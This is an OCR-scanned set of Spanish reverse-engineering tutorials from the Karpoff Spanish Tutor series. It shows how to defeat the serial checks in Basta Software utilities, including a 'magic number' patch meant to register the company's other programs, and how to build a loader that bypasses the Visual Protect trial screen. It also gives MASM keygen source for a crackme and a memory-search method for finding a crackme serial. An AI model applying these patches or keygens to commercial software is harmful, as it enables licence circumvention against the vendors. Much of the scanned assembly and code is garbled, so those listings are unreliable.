:0040FBC1 49 dec ecx Ecx = -1 = FFFFFFFF 

:0040FBC2 7903 jns O0OO40FBC7 Salta si el flag de signo está a cero (no salta) 
:0040FBC4  83C10F add ecx, 0O0OO00F Ecx = E 

:0040FBC7 8A1C31 mov bl, byte ptr [ecx+esi] bl =30 

:0040FBCA — OFBED3 movsx edx, bl Edx = 30 

:0040FBCD  OFAFD1 imul edx, ecx Edx = 30 * E = 2A0(h) 

:0040FBDO  2BC2 sub eax, edx Eax = 17F4(h)-2A0(h) = 1554(h)= 5460 
:0040FBD2.  B90A000000 mov ecx, 0000000A Ecx = A(h) = 10 

:0040FBD7 99 cdq 

:0040FBD8 — F7F9 idiv ecx Divide eax por ecx y el resto lo pone en edx 
:0040FBDA — 80C230 add dl, 30 En este caso el resto es cero O + 30 = 30 
:0040FBDD — 3AD3 emp dl, bl 30=30  ;-) 

:0040FBDF — 7406 je 0O40FBE7 Debe saltar, sino va a error 

:0040FBE1 SF pop edi Esta es la dirección de error que habíamos eludido anteriormente 


A esta altura te estarás preguntando ¿Por qué habiendo tantos tutoriales en la red, justo te fuiste a bajar este? ;-) Que se 
le va a ser, dura la vida del cracker. Revisemos que hizo el programa en esta segunda etapa. Concretamente 
efectuó la diferencia entre una suma de productos y un número de nuestro serial, en este caso el décimo quinto (0), 
multiplicado por su posición dentro del mismo(E).Luego efectuó el cociente con A(h). Al resto guardado en Edx le sumó 
30 y lo comparó con el valor en ascii de ese mismo número (30 = 0). No fue casualidad que haya coincidido, hice algunas 
cuentas previamente para no extender aún más este tuto. Vemos que inmediatamente debajo de ese salto está la temida 
posición 40FBElI que habíamos evitado en la primera parte de la comprobación. Por lo que a los que prefieran patchear, 
tendrán que hacer que salte siempre. Si te digo que la cosa no termina acá, que todavía queda otro algoritmo por cumplir 
tu sorpresa va a ser tan grande como la mía cuando la descubrí. Quizo el azar que el número 12315608-90127401 cumpla 
la tercer condición, (pura coincidencia). La descubrí buscando números de serie alternativos (por ejemplo 12345608- 
90127491 cumple las dos primeras pero no la tercera). Esta tercer comprobación se encuentra en el call 40FA40 unas 
cuatro líneas después del último salto. La misma es muy similar a este último checkeo (cociente entre una suma de 
productos y un número) con una sútil variación. En Edx como antes quedará alojado el resto, pero ahora deberá ser cero ya 
que inmediatamente despues hará un test edx, edx seguido de un ¡nz que de saltar nos lleva al mensaje de error. 


:0040FACO 85D2 test edx, edx En edx está el resto del cociente (tendrá que ser cero) 
:0040FAC2 750C jnz OOJOFADO No tiene que saltar 


Te queda como tarea recorrer esta última rutina con los dos seriales de prueba y comprobar lo que te digo. Para 
encontrarla poné un bpx 40FA87 que ahí empieza la cosa. Para desregistrar el programa y seguir practicando, ejecutá el 
regedit, andá a HKEYLocal machine/software/basta/reglo/current versión y borra la clave llamada reserved2 la misma 
se genera cuando introducís el serial correcto. Para los que vienen patcheando en 40FAC2 hay un tercer salto a invertir. 


Nombre Datos 
[ab] (Predeterminado) [valor no establecido) 
lab] Path "CAARCHIVOS DE PROGRAMABASTA COMPUTINGAREGLO+REGLO.EXE" 
88] ReservedO 0x3a97f2f8 (983036664) 
1d Reserved2 ''8897562874839901" 
Re] Reserved3 Modificar Ox00000001 (1) 
22] Reserved5 E Ox3aaaeabl1 [984279729] 
28] Version 0x00030000 (196608) 
b Cambiar nombre 
Recordemos que el valor de esta aplicación es de $15!!!!!!. Por qué invertir tanto tiempo en el sistema de protección 


tan complejo?. Analicemos las posibles respuestas. Puede que el programador también sea un cracker, tenga un amigo 
cracker o al menos haya leido unos cuantos tutoriales. Puede que sea un inadaptado social, que no tenga amigos, hobbies, 
ni mujer ;-). O muy probablemente todo este esfuerzo no sea para esta única aplicación. 


Número mágico 


Qué es esto algún nuevo método de crackeo esotérico???. (Jodida la ginebra en ayunas 8=) ) 
Concentrémonos en la posición 40FB91 del primer algoritmo de comprobación 


:0040FB91 83F907 emp ecx, 00000007 
:0040FB94 754B jnz 0040FBE1 


Qué pasaría si ( conservando todo el resto de la rutina de comprobación exactamente igual ) en lugar de comparar ecx 
con 00000007, lo comparara con por ejemplo 00000004 97? — Exacto !!!!!!!!. Obtendríamos un número de serie 
completamente distinto a pesar de usar la misma protección. Ese es el concepto de número mágico. Exactamente eso es 
lo que ocurre en HORAS. Hacé lo siguiente abrí el ejecutable de HORAS con un editor hexadecimal (yo usé el Hex 
Workshop), clickea en Edit y luego en la opción Find . Completá la casilla de búsqueda con por ejemplo la inconfundible 
instrucción 8D8SCS1FOFDFFFF que se encuentra justo antes de cmp ecx, 0000000X (83F90X). El valor de X es el número 
con el que compara. Para REGLO, como ya vimos X = 7. Para HORAS, X=4. Para que puedas seguir más 
fácilmente lo que te estoy diciendo, acá va una tabla comparativa con las posiciones del WD32DSM según los distintos 
programas y los números con los cual compara el ecx. 


Programa Posición Comparación 
| Reglo 3.0 | 40FB91 | cmp ecx, 00000007 
Horas 3.7 417421 cmp ecx, 00000004 
| Deletor 2.6 40CBF1 | empecx, 00000001 


Filo 2.0 40A601 cmp ecx, 00000003 
Unios 1.9 40EEE3 cmp ecx, 00000008 
ExIcon 1.9b 40BC01 cmp ecx, 00000002 


Etc. Etc. Etc. 


Ahora tienes toda la información que necesitas. Que hacer, depende de lo que más te guste, jugar con las matemáticas o 
patchear. Si logras conseguir un serial correcto para alguno de los utilitarios anteriores, podrás hacer un patcheado 
elegante en todo el resto de los ejecutables. Ya que cambiando solamente el valor a comparar con ecx (un solo cambio) 
serás capaz de registrar estas y seguramente todas las aplicaciones de Basta Software. Léase esto último tarea para el 
hogar ;-). 


Por dudas o consultas comunicate a http://yerbamatearO yahoo.com 


Espero que este tutorial te haya sido útil, nos vemos en el próximo 
Yerba Mate 


' Todo es fácil cuando se sabe como' 


IMPORTANTE: Lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, NO como robar 
alguna propiedad. Si vas a usar este programa debes comprarlo. Si no fuera por los programadores de shareware no 
tendríamos con que entretenernos. 
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Visual Protect 2.5.7 


KuaTo_ThoR 
INTRODUCCION 


Hola a Todos una vez más. Nuevamente, una protección para software, pero esta vez la propia protección, que 
paradoja :) 


Todo empezó cuando un buen amigo me habló de un buen programa que sirve para escribir archivos PDF, 
EasyPDF, de la misma empresa que este programa, y que realmente está bien, os recomiendo que lo compréis. No 
puedo decir lo mismo de la protección. Veremos cómo con un simple Loader podemos pasar por encima de ella. 


Para quién no lo sepa PrincessSandy es un Patcher, con él crearemos el loader. Os recomiendo que utilicéis éste, 
con otros no se puede. 


Las herramientas podéis encontarlas aquí: http://redrival.com/protools/ 


AL ATAKE 


LA PROTECCIÓN 


Tampoco he destripado mucho la protección, pero básicamente, utiliza el archivo vp.dll. Este archivo es el soporte de la 
protección. Al ejecutar el programa se crea un archivo en el directorio raiz de nuestro disco duro, llamado sysXXXXX.bin, que 
no nos interesa para nada. Luego está el archivo de licencia visualprotect.vpl, que contiene datos como número de dias de 
evaluación, etc. todo ello encriptado. 


También hay que decir, que podemos registrarnos a traves de la red, y una vez hecho esto nos envían el archivo de registro. 
que si utilizamos filemon, podemos ver que se llama visualprotect.vplr. Quizás podíamos haberlo atacado por aquí también. 
Podéis intentarlo si queréis. 


Además, el archivo principal está comprimido, al igual que parece estarlo el archivo vp.dll. 


AL ATAKE 


Pongámonos en marcha, una vez que hemos cargado Softice, iniciamos el programa y nos aparece la siguiente ventana: 


. 


Visual Protect 


isage 


Visual. 
ARONEGN 


Copyright (c) 2000, Yisage Software 


This program is protected by international copyright laws. Unathorized 
reproduction of this program will be procuted to the maximum extent 
hossible under the law. See your documentation for more information 
'Ón your license agreement. 


This application was protected using Visual Protect 
Copyright [2] 1997 2000 Visage Software. 


Mmmmm.... la ya típica ventana de Try y Buy. Vamos a Softice (Ctrl +D), en esta ocasión vamos a utilizar los handles de 
windows para encontrar algo interesante. Lo primero es conocer el nombre de nuestra tarea, nuestro programa. | ntroducimos 
en la linea de comandos de Sice, Task. Nos aparece la lista de tareas activas en nuestra maquina, podemos ver que aparece: 
Visualpr. Este es nuestro programa. Ahora necesitamos saber el handle de la ventana, para ello introducimos HWND Visualpr, 
y nos aparece algo parecido a esto: 


Window-Handle hQueue SZ QOuner ClassName 


53€ (1) 110F 32 VI SUALPRO TForm 
XXX (2) TPanel 
XXX TButton 
XXX TButton 
XXX TButton 


El handle es 53C. Ya lo tenemos todo, ahora vamos a poner el breakpoint. En la linea de comandos introducimos bmsg 53C 


wm_destroy. En un tutorial anterior recuerdo haber explicado esto un poco más, si tenéis dudas mirar por ahí. Una vez 
metido el breakpoint, volvemos a windows (F5) y pulsamos Try. Sice saltará ( quitamos los breakpoints bc*), vamos pulsando 
F12 hasta que aparezcamos en uno de los archivos que dije antes, concretamente aparecemos en VP. Ahora seguimos 
pulsando F12, pero con cuidado, atentos a cualquier cosa que pueda ser interesante. En este caso ese algo interesante, 
puede ser una llamada (un call), seguida de una comparación y ésta a s vez seguida por un salto condicional. ¿Porqué? pués 
por que, en esta ventana tenemos varios botones, cada uno de ellos devuelve un valor al programa, y el programa los 
compara, por ejemplo supongamos que al pulsar Try el valor de eax lo pone a 1 y si pulsamos Buy a 2, el programa tendrá 
que comparar el valor de eax, para saber qué botón hemos pulsado. 


Lo dicho, vamos pulsando F12 hasta que vemos algo realmente interesante: 


015F:00705041 33D2 XC XxX, EDX 

015F :00705043 CH XX, [ESP+04] 
015F:007050147 

D1SF: OSDA9 

D15F: 

D15F:007050A4D 

D15F:O0070504E 0FS5 

D15F:007050B4 41140477?000 

D1SF:007050B9 F6405902 Y [E1AX+59] ,02 
D15F:007050BD 0FSS5 NZ 00705157 


015F : D0O7050C3 Fo CA 007045FO 


D15F:007050C8  583F802 CMP EAX, 02 


D15F:D007050CB OF: 7 00705157 


O15F:007?050D1 SDS595FDFFFF - EiX, [EBP-0268] 


015F:007?050D? B2904567000 O ECX, 00705604 
O15F:007?050DC€  5B15758147000 

D15F:007?050E2 ESC1IECFOFF 

D15F: OSOE”? 

Di5F: OSOED 35B15001477?000 

D15F :007?050F3 5B12 


015F:007050FS ESSEEÍFFFF 


Bien, aparecemos en esa linea, 7050C8. Justo encima, una llamada, y debajo un salto condicional... ¡¡ Justo lo que 
buscábamos !! Ponemos un breakpoint en la llamada (bpx 7050C8), para saber si es la nuestra realmente y volvemos a iniciar 
le programa. Sice salta, justo en la llamada, si pulsamos F4 para ver lo que pasa por windows vemos que la ventana aún no 
ha aparecido. Pulsamos F10 sobre la llamada, y aparece la ventana, pulsamos Try y volvemos a Sice. Si miramos el valor de 
los registros (F2), concretamente el de eax (que es el que compara en la siguiente instrucción), su valor es 1. Si probáis a 
pulsar otros botones de la ventana, veréis que eax cambiará de valor. 


Ya estamos terminando, volvemos a iniciar el programa, nuevamente salta sice. Ahora vamos a probar un parche para la 
ventana, puesto que lo que queremos es que eax sea 1, y la llamada ocupa 5 bytes (E8 28 F8 FF FF), probamos a introducir 
la siguiente instrucción en sice con el comando A: a eip, e introducimos 'mov eax, 01' pulsamos enter un par de veces, y 
veremos que la llamada ha desaparecido y que en su lugar está la instrucción que nosotros hemos metido. Anotad sus bytes 
(B8 01 00 00 00). Ahora pulsamos F5 para ver si es válido el parche ........ !Irtt1111 ARRANCÓ EL PROGRAMA ¡iii 


EL LOADER 


Como dije antes el archivo vp.dll está encriptado o algo así, por tanto si buscamos los bytes que vimos ates, no los 
encontraremos. Para poder parchear el programa necesitamos hacerlo una vez desencritado en memoria. Para ello crearemos 
un loader con el programa PrincessSandy. Lo ejecutamos, seleccionamos el archivo que nos interesa (el ejecutable, no la dll) 
en este caso VisualProtect.exe y pulsamos Add Item, introducimos la dirección (con todos sus ceros, 8 numeros) los datos 


Sólo queda probar el loader. 


FINALIZANDO 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo ( No me pidáis Cracks ¿OK? ). Espero que os haya resultado útil este tuto. No olvidéis que 
nuestro objetivo sólo es aprender. Sin contar con la diversión que esto supone por supuesto ;-)) 


Un Gran Saludo para todos los miembros de [K-FoR], para los amigos de Tutoriales 2000 y para todos vosotros. Profe animo y 
gracias por lo del | ceDump :-); Txeli, espero que te sirva de algo ;-) 


Hasta la próxima... 


« ») —==*ze-« » 


Mi correo: kuato thortdhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 


« >») —==*zeo--« » 
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A 


E E 


INTRODUCCION 


Bueno antes que nada decir que es mi primer tutorial, mi primer Keygen, espero que no se complique la 
cosa y nos entendamos todos. Al ser el primer Keygen que hago, vereis que en el código hay cosas inútiles 
además de estupidas, ya iremos mejorando ;). Este crackme me desconcertó al principio, pues tiene rutinas 
antidebugger, el fileinspector no nos dice nada concreto, nos da error al intentar abrirlo con el procdump, 
pero cuando utilizamos el ataque adecuado es bastante sencillo. 


AL ATAKE 


Vamos a ello, ejecutamos el crackme y nos da un MessageBoxA con el titulo de ERROR! y Debugger detected cuando 
tenemos el Softice (SI ) cargado, bueno pues vale, ponemos un bpx messageboxa y ejecutamos de nuevo,bien SI 
rompe, le damos a F12 y nos sale el messageboxa, le damos a aceptar y ¿qué pasó?, en vez de caer en el código nos 
envia directamente a ExitProcess y nos saca del programa, bueno tampoco pasa nada pasamos al primer enfoque de 
ataque: 


1 forma: Ponemos el bpx messageboxa y esperamos que rompa SI, vale ahora buscamos el texto de la ventana, 
ponemos S_30 | ffff1If "ERROR" y nos aparece en 406632, vale ya tenemos una via de entrada, no podemos ponerle un 
bpx debido a la rutina antibreakpoints que utiliza, pero podemos usar un Bpm 406632 RW, salimos ejecutamos el 
crackme y nos rompe en plena rutina descompresora, ahora estamos en el codigo y lo vamos traceando, vemos como se 
descomprimen las lineas siguientes a la vez que avanzamos, al principio intente eliminar la rutina antibpx buscando las 
referencias a INT3 (CC), pero al final me cansé debido a la descompresión larga y tediosa, cargué el ICEDUMP y , 
sorpresa, el programa arranca, asi que pasamos a la 2 forma. 


2 forma: Bueno ahora ya tenemos el programa cargado y listo para meter nuestro serial, podriamos intentar poner un 
bpx getdlgitemtexta, pero salta la detección del SÍ, una solución bastante válida seria; una vez cargado el crackme 

pasamos a SI ponemos , hwnd crackme, nos aparecen varias columnas, nos fijamos que en la de la derecha donde pone 
"Class name” hay tres button (botones), y en la de la izquierda donde pone Window handle pues el handle del boton, 


vamos a coger el primero 0358 (el handle va a variar cada vez que ejecutamos el programa), y ponemos un , bmsg 0358 
wm_command, esto pone un bpx de mensaje cuando activemos ese boton, salimos al programa, le damos al boton y 
rompemos en Sl y despues de varios F12 estamos en pleno codigo (en mi caso no pone nada en la línea del SI) y 
bastante cerca, caminamos hacia arriba y vamos viendo el messageboxa de niño bueno y el getdlgitemtexta que coge 
los datos. Bueno, vamos a dejarnos de boberias ya que sabemos que usa getdlgitemtexta y que no le gustan los bpx a 
esa api, nos vamos al SI y ponemos , u getdlgitemtexta, con esto nos muestra el codigo de la api en user32, le ponemos 
un bpx a una de las primeras líneas por ejemplo a la que pone, PUSH EBP, salimos metemos el nombre y el serial 
damos al boton y aparecemos en SI en user32 damos a F12 y estamos en pleno código bueno justo despues del 
getdlgitemtexta del nombre, traceamos un poco pero ojo, te acuerdas de que también habia rutina antitraceo, si le 
damos a F10 nos manda para fuera, asi que a F8, que tampoco hay calls largos ni nada, pasamos el getdlgitemtexta del 
serial, y vemos que el codigo tiene unas lineas muy raras, pero que al pasar por el, CALL [4033EC] se descomprimen y 
aparece el codigo en cristiano, el inconveniente es que al movernos por la ventana de codigo vuelve a aparecer el 
codigo raro, tampoco pasa nada seguimos el proceso para obtener el serial con paciencia, pero comprenderas que no te 
muestre el codigo entero, no?, de todas formas el codigo del keygen es casi igual solo varian las direcciones de 
memoria utilizadas . Primero obtiene el numero de caracteres del nombre y ve si está entre 6 y 30, luego compara el 
serial que debe ser de 12 cifras, comprueba que la quinta cifra sea un guion haciendo un xor de 52 con 7f (da 2D = a un 
guion) para despistar, comprueba que la octava cifra sea tambien un guion, si no se cumple alguna de estas 
comprobaciones nos da un messageboxa de Oh, oh invalid code, y después empieza lo duro, coge el nombre y va 
haciendo sumas y operaciones letra a letra, va sumando, desplaza, lo mueve, lo vuelve a sumar, lo vuelve a mover, lo 
mejor es echar un vistazo al codigo del keygen, al final va comparando número a número con nuestro serial 
despreciando la cuarta cifra y las dos últimas. Bueno ahí va el codigo del keygen para masm32, creo que no es muy 
complejo, si algo no se entiende seguramente es que no deberia estar ahí, je je .. 


RSRC.RC 

ttinclude "resource.h" 

ttdefine IDC_EDIT 3000 
ttdefine IDC_BOTON 3001 
ttdefine IDC_SALIR 3002 
ttdefine IDC_ACERCA 3003 
ttdefine IDC_STATIC -1 
ttdefine IDM_BORRAR 32001 


ttdefine IDM_SALIR 32003 


500 ICON DISCARDABLE "GALL.ICO" 


MyDialog DIALOG 10, 10, 205, 70 

STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX | 

WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK 
CAPTION "Keygen para Crackme de Txotxo" 


FONT 8, "MS Sans Serif" 


CLASS "DLGCLASS" 

BEGIN 

EDITTEXT 3000, 15,17,111,13, ES_AUTOHSCROLL | ES_LEFT [WS_TABSTOP 
DEFPUSHBUTTON "Calcular", 3001, 150,6,40,13 
PUSHBUTTON "Salir", 3002, 150,22,40,13 
PUSHBUTTON "Acerca", 3003, 150,38,40,13 
GROUPBOX "Pon el nombre", -1, 10,3,121,37 
END 

MyMenu MENU 

BEGIN 

POPUP "Funciones" 

BEGIN 

MENUITEM "é¿Calcular", 32000 

MENUITEM "á£Borrar", 32001 


MENUITEM "", , 0x0800 /*MFT_SEPARATOR*/ 


MENUITEM "ézSalir", 32002 
END 


END 


KEYGEN.ASM 


-386 

.model flat,stdcall 

option casemap:none 

WinMain proto :DWORD,:DWORD,:DWORD,:DWORD 
include iÍmasm32úincludelwindows.inc 


include Ímasm32Wincludeluser32.inc 


include imasm32úincludelkernel32.inc 

includelib masm32Vibluser32.lib 

includelib imasm32Viblkernel32.lib 

«data 

ClassName db "DLGCLASS",0 

MenuName db "MyMenu",0 

DlgName db "MyDialog",0 

AboutName db "Acerca de !!!JNP",0 

acerca db "Este es mi primer Keygen, gracias Txotxo,",10,13 
db "con este Crackme he aprendido mucho.",0 

AppName db "Keygen para Crackme de Txotxo",0 
TituloSerial db "Keygen por !!!JNP",0 

mensajel db "El nombre debe tener entre 6 y 30 caracteres",0 


texto db "0123456789 ABCDEF¡",0 


«data? 

hwndDlg dd ? 

hInstance HINSTANCE ? 
CommandLine LPSTR ? 
nombre db 31 dup(?) 
icono dd ? 

temp dd ? 

enmedio db 4 dup(?) 
temp6 dd ? 

enmedio db 4 dup(?) 
temp2 dd ? 

enmediol db 4 dup(?) 


temp3 dd ? 


enmedio2 db 4 dup(?) 

temp4 dd ? 

enmedio3 db 4 dup(?) 

temp3 dd ? 

enmedio4 db 4 dup(?) 

resultado dd ? 

Const 

IDC_EDIT equ 3000 

IDC_BOTON equ 3001 

IDC_SALIR equ 3002 

IDC_ACERCA equ 3003 

IDC_STATIC equ -1 

IDM_CALCULAR equ 32000 
IDM_BORRAR equ 32001 

IDM_SALIR equ 32002 

.code 

start: 

invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke GetCommandLine 

invoke WinMain, hInstance, NULL,CommandLine, SW_SHOWDEFAULT 
invoke ExitProcess,eax 

WinMain proc hInst:HINSTANCE, hPrevInst: HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD 
LOCAL we:WNDCLASSEX 

LOCAL msg:MSG 

LOCAL hDlg:HWND 

mov wc.cbSize,SIZEOF WNDCLASSEX 


mov wc.style, CS_HREDRAW or CS_VREDRAW 


mov wc.IpftnWndProc, OFFSET WndProc 

mov wc.cbCIsExtra,NULL 

mov wc.cbWndExtra DLGWINDOWEXTRA 

push hInst 

pop wc.hInstance 

mov wc.hbrBackground,COLOR_BTNFACE+1 

mov wc.IpszMenuName, OFFSET MenuName 

mov wc.lpszClassName,OFFSET ClassName 

invoke LoadIcon,hInstance,500 

mov wc.hIcon,eax 

mov wc.hIconSm,eax 

mov icono,eax 

invoke SendMessage,hDlg, WM_SETICON,ICON_BIG,icono 
invoke LoadCursor,NULL,IDC_ARROW 

mov wc.hCursor,eax 

invoke RegisterClassEx, addr wc 

invoke CreateDialogParam,hInstance, ADDR DlgName,NULL,NULL,NULL 
mov hDlg,eax 

invoke GetDlgltem,hDlg,IDC_EDIT 

invoke SetFocus,eax 

INVOKE ShowWindow, hDlg,SW_SHOWNORMAL 
INVOKE UpdateWindow, hDlg 

.WHILE TRUE 

INVOKE GetMessage, ADDR msg,NULL,0,0 
.BREAK .IF (leax) 

invoke IsDialogMessage, hDlg, ADDR msg 

.1f eax==FALSE 


INVOKE TranslateMessage, ADDR msg 


INVOKE DispatchMessage, ADDR msg 

.endif 

.ENDW 

mov eax,msg.wParam 

ret 

WinMain endp 

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, IParam:LPARAM 
.1ifuMsg==WM_CREATE 

invoke SetDlgltemText,hWnd,IDC_EDIT,ADDR AppName 
.ELSEIF uMsg==WM_DESTROY 

invoke PostQuitMessage,NULL 

.ELSEIF uMsg==WM_COMMAND 

mov eax,wParam 

IF IParam== 

.IF ax==IDM_CALCULAR 

calcula: 

invoke GetDlgltemText,hWnd,IDC_EDIT, ADDR nombre, 31 
pushad 

XOr €CX,eCx 

mov ebx,offset nombre 

aqui: 

mov al, [ecx+nombre] 

cmp al,00 

jz O 

inc ecx 

cmp ecx,1Eh 


jnz aqui 


o: 

cmp ecx,06h 

jb errorl 

mov ebx, offset temp 
xor eax,eax 

mov esi, offset temp2 
mov edi, offset nombre 
Ol: 

mov al, [edi] 

shl eax,02h 

add [esi],eax 

add [ebx],eax 

inc edi 

cmp byte ptr [edi],00h 
jnz Ol 

rel dword ptr [esi],05h 
rel dword ptr [ebx],09h 
mov edx,[ebx] 

add edx,[esi] 

mov ecx,offset temp2-5 
mov [ecx],edx 

mov esi,offset temp2-19 
mov ax,[ecx] 

mov [esi],ax 

add ecx,02 

mov esi,offset temp2-14 
mov ax,[ecx] 


mov [esi],ax 


mov esi,offset temp2-14 
xor eax,eax 

mov ah,[esi+01] 

mov esi,offset temp2-19 
add ah,[esi] 

rcl eax,Och 

mov esi,offset temp6 
mov [esi],ah 

xor eax,eax 

mov ecx, offset temp2-19 
mov edx,02h 

mov edi, offset texto 
mov esi,offset temp3 
push segundo 

j¡mp E2 

segundo: 

xor eax,eax 

mov ecx, offset temp2-14 
mov edx,02h 

mov edi, offset texto 
mov esi,offset temp4 
push tercero 

jmp E2 

tercero: 

xor eax,eax 

mov ecx, offset temp6-1 
mov edx,02h 


mov edi, offset texto 


mov esi,offset temp5 
push sigue 

jmp 2 

(02: 

mov ah, [ecx] 

shr ah,04h 

shr eax,08h 

mov bh,[edi+eax] 
mov [esi],bh 

xOr eax,eax 

mov ah, [ecx] 

shl eax,14h 

shr eax,1ch 

mov bh,[edi+eax] 
mov [esi+01],bh 

inc ecx 

add esi,02h 

dec edx 

jnz 2 

pop eax 

jmp eax 

sigue: 

mov edi, offset temp3 
mov esi,04h 

mov eax,offset resultado 
(03: 

mov cl, [edi] 


mov [eax],cl 


inc eax 

inc edi 

dec esi 

jnz 03 

mov b1,2dh 
mov [eax],bl 
mov esi,02h 
(04: 

mov cl,30h 
inc eax 

mov [eax],cl 
dec esi 

jnz 04 

inc eax 

mov bl,2dh 
mov [eax],bl 
mov edi,offset temp3+8 
mov esi,04h 
OS: 

mov cl, [edi] 
inc edi 

inc eax 

mov [eax],cl 
dec esi 

jnz OS 

mov eax,offset temp 


mov edi,offset temp2 


mov ebx,offset temp3 

mov ecx, offset temp4 

mov edx,offset temp5 

mov esi,00000000h 

mov [eax],esi 

mov [edi],esi 

mov [ebx],esi 

mov [ecx],esi 

mov [edx],esi 

popad 

jmp noerror 

errorl: 

invoke MessageBox,NULL,ADDR mensajel,ADDR TituloSerial, MB_OK 
jmp borrar 

noerror: 

invoke MessageBox,NULL,ADDR resultado, ADDR TituloSerial, MB_OK 
.ELSEIF ax==IDM_BORRAR 

borrar: 

invoke SetDlgltemText,hWnd,IDC_EDIT,NULL 
.ELSE 

invoke Destroy Window,hWnd 

.ENDIF 

.ELSE 

mov edx,wParam 

shr edx,16 

.IF dx==BN_CLICKED 

.IF ax==IDC_BOTON 


jmp calcula 


.ELSEIF ax==IDC_SALIR 
invoke SendMessage,hWnd, WM_COMMAND,IDM_SALIR,0 
.ELSEIF ax==IDC_ACERCA 


invoke MessageBox,NULL,ADDR acerca, ADDR AboutName,MB_OK 


.ENDIF 

.ENDIF 

.ENDIF 

.ELSE 

invoke DefWindowProc,hWnd,uMsg,wParam,lParam 
ret 

.ENDIF 

xor eax,eax 

ret 

WndProc endp 


end start 


He probado con todos los nombres que se me han ocurrido y siempre ha salido OK. 


Espero que se haya entendido, explicar el Keygen ya seria otro tutorial, cualquier duda : 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
| CEFORTRESS cracklWE level 1 - l|evell. exe 


Serial. 

Buscar un Numero de Serie valido 
CrackME 

NULA - [ SUPERNEVBI El] 


ww. i|cefortress. com 


Softice - Micho cerebro - (Un pokillo de suerte) 
rulzgz FECHA: 20/02/2001 


INTRODUCCION 


Este es mi primer tutorial (y espero ke no el ultimo), La verdad ke yo soy un newbie, probablemente mucho mas ke algunos de los ke lean este 
tute, asi ke si alguien kon un poko mas de experiencia ke yo en el asunto lee esto y ve algun fallo, o simplemente kree ke puede mejorarlo, k me 
lo komunike por email a rulzgz(teleline.es. Pero recordad ke esta echo por y para NEWBIES. 


Pues dicho esto vamos al tajo :) 


Se trata de un programa echo por el grupo ICEFORTRESS cuya unika finalidad es ser crackeado :), este es el de nivel 1, en kuanto konsigues 
crackearlo te dan la URL para el crackme de siguiente nivel. Pero en este caso se han tomado muy poco empeño en protegerlo, o es un fallo del 
programador, no sé. 


AL ATAKE 


La verdá es ke descubrí la forma de crackear este programa con un poko de koña, ahora os lo explicaré: En algun tute leí ke a veces los inkautos 

programadores antes de hacer la comparación entre un kodigo malo(el nuestro) y uno bueno(el real) guardaban ambos en posiciones de memoria 

muy cercanas, con lo kual solo hay k buskar nuestro password o nombre de usuario en la memoria y si habia suerte por al lao habia un numero ke 
resultaba ser el bueno :). Ahora lo expliko. 


En primer lugar se rellena las dos casillas ke hay al ejekutar el programa, en mi caso puse: 


NAME: rulzgz 
SERIAL: 666999666 


Muy bien, ahora simplemente entramos en el Softice (CRTL + D) y escribirmos: 
bpx hmemcpy 


Regresamos a windows pulsando F5, mu bien, kuando pulsemos el boton register en el crackme saltara el softice. Pero todavia no estaremos 


instrucciones en ensamblador (*NOTA* Os recomiendo muy seriamente a todos los ke empezeis, ke es MUY konveniente saber algo de 
ensamblador antes de empezar a crackear, os lo digo como propia experiencia, ke si no se sabe ASM kuesta MUCHO mas) vais 


traceando un poco con F10 cuando creais que el mensaje de error esta a punto de aparecer (bueno, vais provando si no sale tracear un poco mas 
con F10) escribir: 


S 30 L FFFFFF "666999666" 


En vuestro caso escribid vuestro codigo en vez de 666999666 :) y en una de las ventanas del Softice en la parte de la derecha aparecera vuestro 
nombre y vuestra clave y justo debajo un extraño numero como este (en mi caso): 


114117108122103122 


Y.... efectivamente al salir y poner vuestro nombre y ese codigo el programa os dice la URL para encontrar el crackme del siguiente nivel :) Muy 
bien Ahora ya lo teneis "crackeado" pero aún vamos a ir un poco mas lejos :), fijaros en el kodigo y en vuestro nombre : 


114 117 108 122 103 122 
r u | z g z 


¿No hay algo raro? :) probemos con distintos nombres: 


zgzgz9g=> 122 103 122 103 122 103 
rrruuu=>114 114 114117 117 117 


Parece ke nuestras sospechas estan fundadas :) y si efectivamente para calcular la clave para nuestro nombre simplemente sustituye cada letra 
de nuestro nombre por un numero predefinido :) umm curioseemos un poko mas: 


abcdef=> 97 98 99 100 101 102 
ghijk!l=> 103 104 105 106 107 108 
mnopqr=>109 110 111 112113114 
stuvwx=>115116 117 118 119 120 
yz1234=> 121 122 49 50 51 52 
567890=> 53 54 55 56 57 58 


Introduciendo unos kodigos komo estos (o todos de vez) obtendremos la ekivalencias de todo el abecedario ke son las siguientes: 


abcd e f g h ¡ jj k |m n op q r s tu v w x yz 1234567890 


97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 49 50 51 52 53 54 55 56 57 58 


Ke os pareceria hacer un KEYGEN Pos ¡o kreo ke kon estos datos, y kon algo ke sepais de programación facilmente lo podréis hacer :) ya ke este 
crackME va tomando los caracteres del nombre uno a uno y los va sustituyendo por los correspondientes numeros preestablecidos. Si alguien se 
anima y lo hace, ke me lo pase a rulzgzGOteleline.es 


Bueno pos espero ke os haya sido util y ameno este tutorial para kualkier sugerencia, duda, felicitacion, abucheo, etc... plz escribirme a 
rulzgz(teleline.es 


-=[SALUDOS]=- 


M.Silver/WkT - Por ayudar re y aguantarme tantos y tantos di as 
Karpoff - Profesor X - Por la gran labor ke estan haciendo recopilando tutes 
A toda la gente ke escribe tutes par NEVBI ES en kastel | ano 
A toda la gente de los kanal es +HAtrio y +*Crackers del |RC- HI SPANO 
Y a toda la gente del desaparecido *Sexnet (el ¡ntecanmbio de passwords es ¡legal segun los ADM MN del 
hispano pero pa m ke si mpl emente son unos FASCISTAS y k en su red no hay libertad de expresi on) 
